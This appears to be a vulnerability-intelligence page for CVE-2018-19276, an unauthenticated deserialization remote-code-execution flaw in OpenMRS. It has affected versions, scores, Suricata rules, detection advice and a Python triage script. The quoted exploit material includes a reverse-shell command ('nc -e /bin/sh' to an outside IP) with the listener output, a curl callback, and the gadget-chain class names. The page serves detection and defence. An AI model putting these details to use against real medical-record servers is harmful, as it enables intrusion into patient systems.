CVE-2018-19276
Published 2019-03-21
Priority P1 92 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 98.81% (99.9th percentile)
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
Affected (3 ranges)
The "before 2.24.0" in the description is a version of the webservices.rest module, which ships separately from the platform; the platform releases listed below bundle a fixed module.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openmrs | openmrs | >= 1.12.0 < 1.12.1 | 1.12.1 |
| openmrs | openmrs | >= 2.0.0 < 2.0.8 | 2.0.8 |
| openmrs | openmrs | >= 2.1.0 < 2.1.4 | 2.1.4 |
Detection & IOCs (extracted from sources)
command: `sh -c <cmd>` (the Metasploit module passes `sh`, `-c` and the command as three separate string elements in the XML, POSTed to /ws/rest/v1/concept with Content-Type: text/xml)
other: com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data
suricata (ET Open sid 2031259; the empty content:"" matches are XML element patterns that did not survive extraction, so pull the rule by SID from the ruleset rather than deploying this copy)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; content:"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"; fast_pattern; reference:url,www.exploit-db.com/exploits/46327; reference:cve,2018-19276; classtype:attempted-admin; sid:2031259; rev:2; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2020_12_04, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2024_03_07, reviewed_at 2024_05_06;)
suricata (ET Open sid 2030258, same caveat on the empty content:"" matches; urilen:19 pins the URI to exactly /ws/rest/v1/concept, so this rule does not fire for an instance deployed under /openmrs)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276"; flow:established,to_server; urilen:19; http.method; content:"POST"; http.uri; content:"/ws/rest/v1/concept"; fast_pattern; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; reference:url,www.rapid7.com/db/modules/exploit/multi/http/openmrs_deserialization; reference:cve,2018-19276; classtype:attempted-admin; sid:2030258; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_08, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07;)
- Detect exploit attempts by matching HTTP POST requests to /ws/rest/v1/concept whose XML body contains XStream gadget markers (e.g. java.lang.ProcessBuilder, com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data). Caveat: ET sid 2030258 pins the request with urilen:19, exactly the length of /ws/rest/v1/concept, so it does not fire for an instance deployed under /openmrs (a 27-byte URI, and the second root the nuclei template probes); sid 2031259 keys on the Base64Data class name in any POST body and covers both.
- Look for HTTP POST requests with Content-Type: text/xml to /ws/rest/v1/concept; the REST API is normally driven with application/json, and the exploit sends XML.
- The server response to a caught deserialization attempt contains 'Could not read [class org.openmrs.module.webservices.rest.SimpleObject]' and 'XStream unmarshalling exception'; monitor for these strings in HTTP responses as evidence of exploitation attempts.
- The payload is deserialized before the exception handler runs, so a 500/error JSON response does not mean the attempt failed: check for outbound reverse-shell connections (e.g. nc) from the OpenMRS/Tomcat process.
- The Metasploit module targets port 8081 by default; watch for exploitation attempts on non-standard HTTP ports hosting OpenMRS.
- The exploit uses marshalsec's XStream "ImageIO" gadget chain, which reaches java.lang.ProcessBuilder.start through JDK javax.imageio classes unmarshalled by XStream (the chain is not part of XStream itself); look for these class names in POST bodies to /ws/ endpoints.
- For nuclei-based detection, match a DNS interaction on interactsh combined with an application/json Content-Type and a response body containing 'message":' after the crafted POST, covering both the root and /openmrs path variants.
- The advisory's "before 2.24.0" is a webservices.rest module version (platform releases of that era were 1.12.x to 2.1.x, see the Affected table); v2.1.2 and v2.21 were confirmed exploitable in testing.
- The vulnerability is in the `webservices.rest` module; if this module is disabled or not installed, the attack surface is removed.
- Exploitation is unauthenticated: no credentials are required, which makes perimeter detection critical.
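The request- and response-side indicators above, turned into triage logic as an added example (this is not code from OpenMRS, Emerging Threats or Rapid7). It assumes transactions are available as raw HTTP/1.1 text, as a proxy log or a PCAP-extracted stream would provide; the sample requests are constructed, and the JSON shape of the error response is an assumption, only the two marker strings in it come from this page.

```python
"""Triage captured HTTP transactions for CVE-2018-19276 exploitation attempts.

Added example for this page. It encodes the indicators listed above: XML posted to
/ws/rest/v1/concept, the gadget class names the ET rules key on, and the XStream
error string the server returns after the payload has already run.
"""
from dataclasses import dataclass
from typing import Dict, List

TARGET_PATH = "/ws/rest/v1/concept"  # matched under / and /openmrs alike (no urilen pin)
GADGET_MARKERS = (
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
    "java.lang.ProcessBuilder",
)
RESPONSE_MARKERS = (
    "Could not read [class org.openmrs.module.webservices.rest.SimpleObject]",
    "XStream unmarshalling exception",
)


@dataclass
class HttpTxn:
    method: str
    uri: str
    headers: Dict[str, str]
    body: str
    response_body: str = ""


def parse_request(raw: str, response_body: str = "") -> HttpTxn:
    """Parse a raw HTTP/1.1 request (request line, headers, blank line, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpTxn(method, uri, headers, body, response_body)


def indicators(txn: HttpTxn) -> List[str]:
    """Return every indicator that fires for the transaction; an empty list means clean."""
    hits: List[str] = []
    path = txn.uri.split("?", 1)[0]
    ctype = txn.headers.get("content-type", "").lower()
    # The REST API is driven with JSON; XML to the concept endpoint is the exploit's shape.
    if txn.method == "POST" and path.endswith(TARGET_PATH) and "xml" in ctype:
        hits.append("xml_post_to_concept_endpoint")
    # Gadget class names (what ET sid 2031259 keys on), independent of URI and content type.
    hits.extend("gadget_marker:" + m for m in GADGET_MARKERS if m in txn.body)
    # Server-side XStream error: evidence of an attempt, not of failure, because the
    # payload is deserialized before the exception handler produces this message.
    if any(m in txn.response_body for m in RESPONSE_MARKERS):
        hits.append("xstream_error_in_response")
    return hits


def verdict(txn: HttpTxn) -> str:
    hits = indicators(txn)
    if any(h.startswith("gadget_marker:") for h in hits):
        return "exploit_attempt"  # treat as possible RCE: check Tomcat's outbound connections
    if hits:
        return "suspicious"
    return "clean"


# Constructed samples (assumed hostname). The attack body carries only the class
# names the rules match on; it is not a working payload.
BENIGN_REQUEST = (
    "POST /openmrs/ws/rest/v1/concept HTTP/1.1\r\n"
    "Host: emr.example.internal\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"names":[{"name":"Fever","locale":"en"}],"datatype":"N/A","conceptClass":"Diagnosis"}'
)
ATTACK_REQUEST = (
    "POST /openmrs/ws/rest/v1/concept HTTP/1.1\r\n"
    "Host: emr.example.internal\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<map><entry><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"/>'
    '<next class="java.lang.ProcessBuilder"/></entry></map>'
)
ATTACK_RESPONSE = (  # assumed JSON framing around the two marker strings from the page
    '{"error":{"message":"Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; '
    'nested exception is XStream unmarshalling exception"}}'
)

if __name__ == "__main__":
    for label, raw, resp in (("benign", BENIGN_REQUEST, ""), ("attack", ATTACK_REQUEST, ATTACK_RESPONSE)):
        txn = parse_request(raw, resp)
        print(label, verdict(txn), indicators(txn))
```

The verdict deliberately escalates on gadget class names alone, without requiring the XStream error in the response: a request that was never answered (connection dropped, worker hung in the spawned shell) is the case most worth investigating, and the error string only ever confirms that deserialization ran.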
CVSS provenance
| Source | Metric version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | CVSS v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | CVSS v3.0 | 10.0 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| NVD | CVSS v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | CVSS v3 | 9.8 | CRITICAL | |
GHSA
GHSA-785q-xwp9-2xw7 (ghsa_unreviewed · 2022-05-13 · CVE-2018-19276 · CRITICAL · CWE-502)
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
VulnCheck
openmrs openmrs Deserialization of Untrusted Data (vulncheck · 2018 · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
Affected: openmrs openmrs
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-28&host_type=src&vulnerability=cve-2018-19276; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-29&host_type=src&vulnerability=c
Suricata
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2 (suricata · 2020-12-04 · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 M2"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; content:"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"; fast_pattern; reference:url,www.exploit-db.com/exploits/46327; reference:cve,2018-19276; classtype:attempted-admin; sid:2031259; rev:2; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2020_12_04, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2024_03_07, reviewed_at 2024_05_06;)
Suricata
ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276 (suricata · 2020-06-08 · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT OpenMRS Deserialization Vulnerability CVE-2018-19276"; flow:established,to_server; urilen:19; http.method; content:"POST"; http.uri; content:"/ws/rest/v1/concept"; fast_pattern; http.request_body; content:""; content:""; distance:0; content:""; distance:0; content:""; distance:0; reference:url,www.rapid7.com/db/modules/exploit/multi/http/openmrs_deserialization; reference:cve,2018-19276; classtype:attempted-admin; sid:2030258; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_08, cve CVE_2018_19276, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_
Exploit-DB
OpenMRS - Java Deserialization RCE (Metasploit) (exploitdb · 2019-12-18 · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
Module header as listed (the `< Msf::Exploit::Remote ... 'Name' =>` span was eaten as an HTML tag during extraction and is restored to the standard module skeleton; Rank and include lines are not reproduced; the listing is truncated in the source after the description):
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OpenMRS Java Deserialization RCE',
        'Description' => %q(
          OpenMRS is an open-source platform that supplies
          users with a customizable medical record system.
          There exists an object deserialization vulnerability
          in the `webservices.rest` module used in OpenMRS Platform.
          Unauthenticated remote code execution can be achieved
          by sending a malicious XML payload to a Rest API endpoint
          such as `/ws/rest/v1/concept`.
          This module uses an XML payload generated with Marshalsec
          that targets the ImageIO component of the XStream library.
          Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.
        ),
```
Exploit-DB
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization (exploitdb · 2019-02-05 · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
Payload: the XML element tags did not survive extraction; only the element values remain, and in document order they identify the marshalsec gadget and its command:
- ProcessBuilder command: `/bin/sh`, `-c`, `nc -e /bin/sh 172.16.32.3 8000` (three separate arguments)
- reflected target: class `java.lang.ProcessBuilder`, method `start`
- placeholder name `foo` (twice)
- the remaining values (`0`, `false`) are the numeric and boolean fields of the gadget objects
The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker needs to send several arguments to a Linux host. After the payload was sent, the handler successfully received a response:
```text
~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Con
```
Metasploit
OpenMRS Java Deserialization RCE (metasploit · exploit/multi/http/openmrs_deserialization)
OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.
Nuclei
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization (nuclei · CVE-2018-19276 · CVSS 9.8 · CRITICAL)
Request body: the XML element tags did not survive extraction. The surviving element values show the gadget invoking `curl {{interactsh-url}}` (the interactsh callback the matcher below looks for) through the method `start`; the other surviving values are `hashCode`, `1337`, `false` and three `0`s.
```yaml
    payloads:
      path:
        - ""
        - "/openmrs"
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "message\":")'
        condition: and
# digest: 4b0a004830460221009f8d39906061e2f6e09acf23e86f76f61644a9df50f267e82082738a7d17ad0a022100fc4fd6c7c38fb74a9c33fe238384f70375bb68ee637fbf04aa8ebf169a931526:922c64590222798bb761d5b6d8e72950
```
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads (blogs_unit42 · 2020-10-14)
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu, Yue Guan, Vaibhav Singhal, Qi Deng
Published: October 14, 2020
Tags: Threat Research · Vulnerabilities · IoT · Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
References
- http://packetstormsecurity.com/files/151553/OpenMRS-Platform-Insecure-Object-Deserialization.html
- http://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.html
- https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization
- https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607
- https://www.exploit-db.com/exploits/46327/